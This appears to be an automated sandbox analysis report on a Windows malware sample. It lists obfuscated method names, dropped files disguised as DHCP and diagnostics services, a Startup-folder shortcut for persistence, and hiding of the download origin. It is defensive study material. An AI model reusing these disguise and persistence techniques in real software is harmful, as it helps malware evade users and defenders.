'#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 14.2.RegAsm.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 14.2.RegAsm.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	File created: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Jump to dropped file
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	File created: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Jump to dropped file

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	File created: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat			Jump to dropped file
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	File created: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat			Jump to dropped file

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinSAT.lnk			Jump to behavior
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinSAT.lnk			Jump to behavior

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinSAT.lnk			Jump to behavior
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinSAT.lnk			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe:Zone.Identifier read attributes \| delete			Jump to behavior

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009C4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	0_2_009C4A35
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A455FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	0_2_00A455FD
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009C4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	0_2_009C4A35
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_00A455FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	0_2_00A455FD
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Code function: 12_2_00984A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	12_2_00984A35

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009E33C7 RtlEncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,		0_2_009E33C7
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Code function: 0_2_009E33C7 RtlEncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,		0_2_009E33C7

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes			Jump to behavior
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes			Jump to behavior

Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
